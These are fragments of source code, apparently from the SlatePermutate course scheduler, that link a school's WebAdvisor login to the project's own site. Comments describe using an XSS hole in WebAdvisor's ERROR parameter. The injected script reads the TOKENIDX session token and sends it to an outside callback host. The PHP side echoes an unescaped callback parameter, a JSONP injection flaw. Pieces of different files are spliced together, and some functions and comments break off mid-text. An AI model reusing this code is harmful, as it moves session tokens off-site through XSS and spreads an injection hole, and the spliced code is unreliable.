/*

 * Assumes that WebAdvisor_scripts.js for WebAdvisor-2.x is loaded,

 * displayFormHTML() or something was called and thus

 * readURLParameters() was called. We attempt to extract TOKENIDX and

 * asynchronously inform slate_permutate about it. We currently assume

 * we're on a login form too.

 */

var slate_permutate_input_login;

(function() {

		var slate_permutate_onload = function() {

				/*

				 * Override the login form's submission handler to catch the

				 * case where we're still trying to load the TOKENIDX or

				 * something else.

				 */

				var inputs = document.getElementsByTagName('input');

				for (var i = 0; i < inputs.length; i ++)

				{

						slate_permutate_input_login = inputs.item(i);

						if (slate_permutate_input_login.getAttribute('name') == 'SUBMIT2')

								break;

				}

				slate_permutate_input_login.setAttribute('value', 'Discovering TOKENIDX...');

				slate_permutate_input_login.setAttribute('disabled', 'disabled');

				/*

				 * Discover the TOKENIDX if it's available.

				 */

				if (containsParameter(g_tokenIdx))

				{

						var TOKENIDX = getURLParameter(g_tokenIdx);

						var myscript = document.createElement('script');

						myscript.setAttribute('type', 'text/javascript');

						myscript.setAttribute('src', decodeURIComponent(getURLParameter('SP_CALLBACK')) + 'callback=slate_permutate_token_callback&TOKENIDX=' + TOKENIDX);

						document.getElementsByTagName('head').item(0).appendChild(myscript);

				}

				else

				{

				}

		}

		/*

		 * Register to run after either of getWindowHTML(),

		 * setWindowHTML(), or displayFormHTML() have been run. These are

		 * run after onload="", so they are required if we're to wait for

		 * the DOM to load...

		 */

		var funcs = ['getWindowHTML', 'setWindowHTML', 'displayFormHTML'];

		for (var i = 0; i < funcs.length; i ++)

		{

				var func = window[funcs[i]];

				window[funcs[i]] = function() {

						func();

						slate_permutate_onload();

				};

		}

})();

function slate_permutate_token_callback(result)

{

		if (result)

		{

				slate_permutate_input_login.setAttribute('value', 'LOG IN');

				slate_permutate_input_login.removeAttribute('disabled');

		}

}

 * along with SlatePermutate.  If not, see <http://www.gnu.org/licenses/>.

 */

require_once('inc/class.page.php');

/*

 * Handle the scripts/webadvisor_tokenidx.js making a TOKENIDX

 * callback, storing that TOKENIDX in our SESSION for later use.

 */

if (!empty($_GET['TOKENIDX']))

  {

    page::session_start();

    $_SESSION['webadvisor_TOKENIDX'] = $_GET['TOKENIDX'];

    $result = 'received ' . $_GET['TOKENIDX'];

    header('Content-Type: text/javascript; charset=utf-8');

    if ($jsonp = !empty($_GET['callback']))

      echo $_GET['callback'] . '(';

    echo json_encode($result);

    if ($jsonp)

      echo ");\n";

    exit;

  }

$page = page::page_create('WebAdvisor');

$school = $page->get_school();

if (empty($school['webadvisor_url']))

  {

    if (!empty($school['registration_url']) && preg_match(',(.*/WebAdvisor),', $school['registration_url'], $matches))

      $school['webadvisor_url'] = $matches[1];

    else

      $school['webadvisor_url'] = $school['url'] . 'WebAdvisor';

  }

/**

 * \brief

 *   Calculate the URI necessary for logging into WebAdvisor.

 *

 * \param $school

 *   The school.

 * \param $dest

 *   The URI to visit after the user has logged into WebAdvisor and

 *   the TOKENIDX has been communicated to $tokenidx_callback.

 * \param $tokenidx_callback

  $dest .= 'from_webadvisor';

  $webadvisor_login_func = $school['id'] . '_webadvisor_login';

  if (function_exists($webadvisor_login_func))

    $webadvisor_login_func($school, $dest);

  /*

   * The hack we are using is that somehow TOKENIDX=&SS=LGRQ&URL=<URI>

   * will both initialize the user's browser with a token cookie and

   * then redirect to URL. Trying to use the proper way of loading the

   * LGRQ (using TYPE=P&PID=UT-LGRQ&PROCESS=-XUTAUTH01) doesn't work

   * because it drops and ignores our URL parameter, leaving the user

   * at the KV site. No other URL I've fiddled with seems to be able

   * to do this combination of logging in and returning the user to us

   * or a URI of our choosing. Once the user's browser has been

   * initialized with a TOKENIDX, loading the page

   * SS=LGRQ&URL=<URI>&ERROR=<XSS> will preserve the ERROR=<XSS>

   * necessary for our XSS and insert it into the login page.

   *

   * HOWEVER, if the browser already has a TOKENIDX-related cookie,

   * then visiting TOKENIDX=&SS=LGRQ&URL=<URL> will cause WebAdvisor

   * to keep redirecting to itself infinitely. Similarly, if the

   * browser does not yet have a TOKENIDX-related cookie,

   * SS=LGRQ&URL=<URL> will redirect the user to URL without giving

   */

    . '&SP_CALLBACK=' . rawurlencode($tokenidx_callback)

  redir($login_form_uri);

}

function redir($dest)

{

  header('HTTP/1.1 302 Found');

  header('Location: ' . $dest);

  header('Content-Type: text/plain; charset=utf-8');

  echo 'Location: ' . $dest;

  exit;

}

/*

 * If the page load was not a redirection from webadvisor, we must

 * clear our local cache of TOKENIDX's value. We need to get a new

 * token because we can't guess what SS= value the ST-WERG form will

 * take unless if we start with a new TOKENIDX which doesn't have any

 * SSes yet. Also, the old token may have (very likely) expired

 * because of the short login timeout.

 */

if (!isset($_GET['from_webadvisor']))

  unset($_SESSION['webadvisor_TOKENIDX']);

if (empty($_SESSION['webadvisor_TOKENIDX']))

  {

    /*

     * Get a token for the ST-WERG form and have the user perform the

     */

    webadvisor_login($page, $school, page::uri_resolve('webadvisor.php') . '?r=' . rand()

		     . '&sections=' . rawurlencode(empty($_GET['sections']) ? '' : $_GET['sections'])

		     . '&school=' . rawurlencode($school['id']),

		     page::uri_resolve('webadvisor.php?'));

  }

/*

 * Use the hopefully-still-valid TOKENIDX to initialize an ST-WERG

 * (STudent Web[A]dvisor Express ReGistration) form. When that form is

 * iniailized, assume that it has SS=1 and submit the form. &APP=ST

 */

$TOKENIDX = $_SESSION['webadvisor_TOKENIDX'];

$page->head();

echo '<form id="sp-webadvisor-form" action="' . htmlentities($school['webadvisor_url'] . '?TOKENIDX=' . $TOKENIDX . '&SS=1', ENT_QUOTES) . '" method="post">' . PHP_EOL;

echo '<p>';

$uri = $school['webadvisor_url'] . '?TOKENIDX=' . $TOKENIDX . '&TYPE=P&PID=ST-WERG';

$onload_html = '="' . htmlentities('javascript:document.getElementById(\'sp-webadvisor-form\').submit()', ENT_QUOTES) . '"';

echo '  <img src="' . htmlentities($uri, ENT_QUOTES) . '" alt="Loading WebAdvisor Express Registration form (ST-WERG)…"'

. ' onload' . $onload_html . ' onerror' . $onload_html . ' />' . PHP_EOL;

echo '  If you are not redirected after 16 seconds, you may try: ' . PHP_EOL;

$sections = explode(',', empty($_GET['sections']) ? '' : $_GET['sections']);